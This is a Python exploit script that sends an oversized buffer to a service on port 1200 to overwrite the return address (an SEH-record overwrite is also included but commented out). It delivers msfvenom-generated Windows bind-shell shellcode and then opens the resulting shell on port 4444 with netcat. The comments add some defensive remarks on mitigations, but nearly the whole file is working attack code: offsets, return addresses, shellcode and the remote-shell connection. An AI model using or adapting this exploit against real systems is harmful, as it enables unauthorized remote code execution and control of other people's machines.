Bind_Shell_Payload.py
# Code to perform Stack Based and SEH based Buffer Overflow and get Shell access.
#
# Structure of this script, as written:
#   1. open a TCP connection to host:port (the vulnerable service),
#   2. send one buffer = filler + overwritten return address / SEH record + shellcode,
#   3. wait, then run `nc` against port 4444 where the bind-shell payload listens.
# The overwrite offsets and addresses are hardcoded for one specific target binary;
# from a defensive standpoint the two observable artefacts are a single oversized
# request (hundreds of 0x41 bytes followed by opaque binary) on the service port and,
# on success, a new process listening on TCP/4444 on the target.  Stack cookies (/GS),
# DEP/NX, ASLR and SafeSEH/SEHOP are the standard mitigations against exactly the
# fixed-address EIP and SEH overwrites used here.
import time
import socket
import subprocess  # NOTE: unused here; `call` is imported again from subprocess at the bottom
host = '127.0.0.1' # Ip Address of the Target Machine
port = 1200 # Open port on the Server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port)) # Connecting to the Port on target machine (raises ConnectionRefusedError if nothing listens)
# Stack-Based Buffer Overflow
junk = b"A"*548 # Number of A's to send (548 bytes of 0x41 filler before the saved return address)
EIP = b'\xdf\x11\x0c\x61' # JMP EIP Address (little-endian address overwriting the saved return address; target-specific)
move_esp = b'\x81\xc4\xc0\xfd\xff\xff'  # x86 `add esp, imm32` with a negative immediate — moves the stack pointer away from the shellcode before it runs; TODO confirm against a disassembler
# Creating a bind_tcp Shellcode using metasploit.
# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=4444 -b '\x00\x0a\x0d' -f c
# (the -b flag excludes NUL/CR/LF, so the bytes below are encoder output, not the raw stager)
bind_tcp = b'\xba\x72\xdf\x28\xc5\xdb\xc2\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x53\x31\x56\x12\x03\x56\x12\x83\xb4\xdb\xca\x30\xc4\x0c\x88\xbb\x34\xcd\xed\x32\xd1\xfc\x2d\x20\x92\xaf\x9d\x22\xf6\x43\x55\x66\xe2\xd0\x1b\xaf\x05\x50\x91\x89\x28\x61\x8a\xea\x2b\xe1\xd1\x3e\x8b\xd8\x19\x33\xca\x1d\x47\xbe\x9e\xf6\x03\x6d\x0e\x72\x59\xae\xa5\xc8\x4f\xb6\x5a\x98\x6e\x97\xcd\x92\x28\x37\xec\x77\x41\x7e\xf6\x94\x6c\xc8\x8d\x6f\x1a\xcb\x47\xbe\xe3\x60\xa6\x0e\x16\x78\xef\xa9\xc9\x0f\x19\xca\x74\x08\xde\xb0\xa2\x9d\xc4\x13\x20\x05\x20\xa5\xe5\xd0\xa3\xa9\x42\x96\xeb\xad\x55\x7b\x80\xca\xde\x7a\x46\x5b\xa4\x58\x42\x07\x7e\xc0\xd3\xed\xd1\xfd\x03\x4e\x8d\x5b\x48\x63\xda\xd1\x13\xec\x2f\xd8\xab\xec\x27\x6b\xd8\xde\xe8\xc7\x76\x53\x60\xce\x81\x94\x5b\xb6\x1d\x6b\x64\xc7\x34\xa8\x30\x97\x2e\x19\x39\x7c\xae\xa6\xec\xe9\xa6\x01\x5f\x0c\x4b\xf1\x0f\x90\xe3\x9a\x45\x1f\xdc\xbb\x65\xf5\x75\x53\x98\xf6\x68\xf8\x15\x10\xe0\x10\x70\x8a\x9c\xd2\xa7\x03\x3b\x2c\x82\x3b\xab\x65\xc4\xfc\xd4\x75\xc2\xaa\x42\xfe\x01\x6f\x73\x01\x0c\xc7\xe4\x96\xda\x86\x47\x06\xda\x82\x3f\xab\x49\x49\xbf\xa2\x71\xc6\xe8\xe3\x44\x1f\x7c\x1e\xfe\x89\x62\xe3\x66\xf1\x26\x38\x5b\xfc\xa7\xcd\xe7\xda\xb7\x0b\xe7\x66\xe3\xc3\xbe\x30\x5d\xa2\x68\xf3\x37\x7c\xc6\x5d\xdf\xf9\x24\x5e\x99\x05\x61\x28\x45\xb7\xdc\x6d\x7a\x78\x89\x79\x03\x64\x29\x85\xde\x2c\x57\x77\xd2\xb8\xc0\x2e\x87\x80\x8c\xd0\x72\xc6\xa8\x52\x76\xb7\x4e\x4a\xf3\xb2\x0b\xcc\xe8\xce\x04\xb9\x0e\x7c\x24\xe8'
# shellcode for displaying a messagebox.
# (benign proof-of-execution payload; only referenced from the commented-out sendall lines below)
msg_box = b'\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7'
# For SEH Based
# Layout of an SEH record overwrite: filler, then the 4-byte "next SEH" slot, then the
# handler address; the handler is expected to bounce execution back into nextseh.
junk_seh=b'A'*636 # Number of A's to send (636 bytes of filler before the SEH record)
nextseh=b'\xeb\x04\x90\x90' # 4 byte JMP Address (x86 short `jmp +4` followed by two `nop`s; skips over the handler address that follows)
seh=b'\x0b\x14\x0c\x61' # Address of SEH (little-endian handler address; target-specific)
nops=b'\x90'*4  # small NOP pad between the SEH record and the shellcode
# To run SEH Based exploit uncomment the following SEH Based exploit and comment the Stack Based exploit.
#s.sendall(junk+EIP+move_esp+msg_box)
#s.sendall(junk_seh+nextseh+seh+nops+msg_box) # SEH Base Exploit
s.sendall(junk+EIP+move_esp+bind_tcp) # STACK-Based Exploit (single write; sendall loops until the whole buffer is queued or raises)
#s.close() # Closing Port 1200
# NOTE: with s.close() commented out the socket is never closed explicitly; it is only
# released when the interpreter exits after the nc call below returns.
print("The message has been sent.")
time.sleep(10) # Time delay of 10sec (fixed wait; nothing here checks whether the target actually started listening)
# Calling Netcat command to connect port 4444 and get the shellof target machine.
# NOTE: `host` above is '127.0.0.1' while this line hardcodes '192.168.1.205' — two
# independent literals.  `call` blocks until the nc process exits, and raises
# FileNotFoundError if no `nc` binary is on PATH.
from subprocess import call
call(["nc","192.168.1.205","4444"])